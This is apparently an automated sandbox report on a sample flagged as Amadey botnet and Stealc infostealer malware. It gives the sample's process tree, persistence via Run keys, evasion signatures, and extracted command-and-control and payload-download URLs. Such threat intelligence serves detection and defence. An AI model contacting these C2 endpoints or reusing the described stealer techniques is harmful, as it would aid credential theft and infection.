Edit tour

Windows Analysis Report
pud8g3zixE.exe

Overview

General Information

Sample name:	pud8g3zixE.exe renamed because original name is a hash value
Original sample name:	57a1c647b3b2b8b56998e59efe21be64.exe
Analysis ID:	1505463
MD5:	57a1c647b3b2b8b56998e59efe21be64
SHA1:	bf90c9e7bf60d57d63e21870e601bf5e43d2676c
SHA256:	3a3c6e9a9b3cbf347aa90af44780a49330f54ac89c5ebf41676fadadb78ef918
Tags:	exe
Infos:

Detection

Amadey, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

pud8g3zixE.exe (PID: 996 cmdline: "C:\Users\user\Desktop\pud8g3zixE.exe" MD5: 57A1C647B3B2B8B56998E59EFE21BE64)

svoutse.exe (PID: 3396 cmdline: "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe" MD5: 57A1C647B3B2B8B56998E59EFE21BE64)

svoutse.exe (PID: 6372 cmdline: C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe MD5: 57A1C647B3B2B8B56998E59EFE21BE64)

svoutse.exe (PID: 7616 cmdline: C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe MD5: 57A1C647B3B2B8B56998E59EFE21BE64)

76251a0626.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe" MD5: 6976C4A250BCFEE1F7CCF3B3DD7CEF7B)

139d3265bb.exe (PID: 8148 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000029001\139d3265bb.exe" MD5: 9720060A0108D1A36B6F051E31353414)

msedge.exe (PID: 2064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2068,i,15318855632718478656,17962543240319232679,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

firefox.exe (PID: 1352 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

88b8632b35.exe (PID: 1568 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe" MD5: 6976C4A250BCFEE1F7CCF3B3DD7CEF7B)

firefox.exe (PID: 4508 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5932 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8420 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2180 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d0c8ec-f242-474c-a604-20d6ab7d4c7d} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebe1c6db10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 10204 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2988 -parentBuildID 20230927232528 -prefsHandle 4092 -prefMapHandle 4140 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c0f5f11-3af4-44b2-a420-af88b8d55af5} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 1ebf3d76b10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

msedge.exe (PID: 2628 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9192 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6876 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5872 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7012 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9212 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7928 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8084 --field-trial-handle=2040,i,13796137825742180335,12528792992371394341,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://asec.ahnlab.com/en/59590/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Threatname: Amadey

{"C2 url": ["http://31.41.244.10/Dem7kTu/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1285433147.0000000000F41000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000002.1321048201.00000000008A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1245341924.0000000005740000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.1308219786.00000000008A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.1267579083.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.1404487341.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.1280591363.0000000004F70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 76251a0626.exe PID: 8008	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 76251a0626.exe PID: 8008	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 88b8632b35.exe PID: 1568	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 88b8632b35.exe PID: 1568	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.svoutse.exe.8a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.svoutse.exe.8a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.svoutse.exe.8a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.pud8g3zixE.exe.f40000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe, ProcessId: 7616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88b8632b35.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1000030001\88b8632b35.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe, ProcessId: 7616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88b8632b35.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe, ParentCommandLine: "C:\Users\user\Desktop\pud8g3zixE.exe", ParentImage: C:\Users\user\Desktop\pud8g3zixE.exe, ParentProcessId: 996, ParentProcessName: pud8g3zixE.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\0e8d0864aa\svoutse.exe" , ProcessId: 3396, ProcessName: svoutse.exe

Suricata Signatures

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-06T09:58:08.750628+0200	2044696	1	A Network Trojan was detected	192.168.2.7	49720	31.41.244.10	80	TCP
2024-09-06T09:58:11.813496+0200	2044696	1	A Network Trojan was detected	192.168.2.7	49722	31.41.244.10	80	TCP
2024-09-06T09:58:14.210326+0200	2044696	1	A Network Trojan was detected	192.168.2.7	49727	31.41.244.10	80	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-06T09:58:12.224839+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49723	185.215.113.100	80	TCP
2024-09-06T09:58:28.486890+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49791	185.215.113.100	80	TCP
2024-09-06T09:58:36.213716+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49801	185.215.113.100	80	TCP
2024-09-06T09:58:39.446468+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49805	185.215.113.100	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-06T09:58:04.754232+0200	2856147	1	A Network Trojan was detected	192.168.2.7	49717	31.41.244.10	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-06T09:58:08.043121+0200	2856122	1	A Network Trojan was detected	31.41.244.10	80	192.168.2.7	49717	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-06T09:58:05.776090+0200	2803305	3	Unknown Traffic	192.168.2.7	49719	31.41.244.11	80	TCP
2024-09-06T09:58:09.448308+0200	2803305	3	Unknown Traffic	192.168.2.7	49721	31.41.244.11	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: pud8g3zixE.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phplS	Avira URL Cloud: Label: malware
Source: http://31.41.244.10/	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/al	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php7	Avira URL Cloud: Label: malware
Source: http://31.41.244.10/Dem7kTu/index.php15e6	Avira URL Cloud: Label: phishing
Source: http://31.41.244.10/Dem7kTu/index.php15;	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/e2b1563c6670f193.phpH4	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/well/random.exe	Avira URL Cloud: Label: phishing
Source: http://31.41.244.10/Dem7kTu/index.php1	Avira URL Cloud: Label: phishing
Source: http://185.215.113.100/en-GB	Avira URL Cloud: Label: malware
Source: http://31.41.244.10/Dem7kTu/index.php9	Avira URL Cloud: Label: phishing
Source: http://31.41.244.10/Dem7kTu/index.phpF	Avira URL Cloud: Label: phishing
Source: http://31.41.244.10/Dem7kTu/index.phpY	Avira URL Cloud: Label: phishing
Source: http://31.41.244.10/Dem7kTu/index.phpe	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: svoutse.exe.7616.15.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://31.41.244.10/Dem7kTu/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: pud8g3zixE.exe	ReversingLabs: Detection: 78%
Source: pud8g3zixE.exe	Virustotal: Detection: 74%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: pud8g3zixE.exe

Joe Sandbox ML: detected

Source: pud8g3zixE.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.222.236.48:443 -> 192.168.2.7:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51436 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51437 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51440 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51444 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:51443 version: TLS 1.2

Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000019.00000003.1924934020.000001EBFDE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr
Source:	Binary string: wshbth.pdbGCTL source: firefox.exe, 00000019.00000003.1976959571.000001EBF1492000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000019.00000003.1974650691.000001EBF1494000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdb source: firefox.exe, 00000019.00000003.1976359294.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wshbth.pdb source: firefox.exe, 00000019.00000003.1976959571.000001EBF1492000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdb source: firefox.exe, 00000019.00000003.1974650691.000001EBF1494000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdbUGP source: firefox.exe, 00000019.00000003.1964531189.000001EBF141D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netprofm.pdb source: firefox.exe, 00000019.00000003.1972681970.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000019.00000003.1924934020.000001EBFDE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr
Source:	Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000019.00000003.1976359294.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netprofm.pdbUGP source: firefox.exe, 00000019.00000003.1972681970.000001EBFEF41000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdb source: firefox.exe, 00000019.00000003.1964531189.000001EBF141D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_00DBDBBE
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D8C2A2 FindFirstFileExW,	21_2_00D8C2A2
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC68EE FindFirstFileW,FindClose,	21_2_00DC68EE
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_00DC698F
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_00DBD076
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_00DBD3A9
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_00DC9642
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_00DC979D
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_00DC9B2B
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose,	21_2_00DC5C97

Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then dec ecx	25_3_000003F084C04C56
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then dec ecx	25_3_000003F084C04C56
